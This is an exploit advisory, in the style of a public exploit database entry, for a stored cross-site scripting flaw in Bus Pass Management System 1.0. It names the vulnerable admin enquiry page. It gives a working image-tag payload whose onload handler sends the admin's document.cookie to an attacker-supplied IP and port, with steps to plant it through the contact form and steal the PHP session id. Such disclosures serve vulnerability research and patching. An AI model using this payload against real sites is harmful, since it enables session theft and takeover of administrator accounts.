Bus Pass Management System 1.0 Cross Site Scripting

# Exploit Title: Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)# Date: 2021-09-17# Exploit Author: Matteo Conti - https://deltaspike.io# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Ubuntu 18.04 - LAMP# DescriptionThe application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie># Prof of concept:- From /contact.php, send a message containing the following payload in "title" or "message" fields:<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>(the first url have to be an existing image)- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php- Your listener will receive the PHP session id.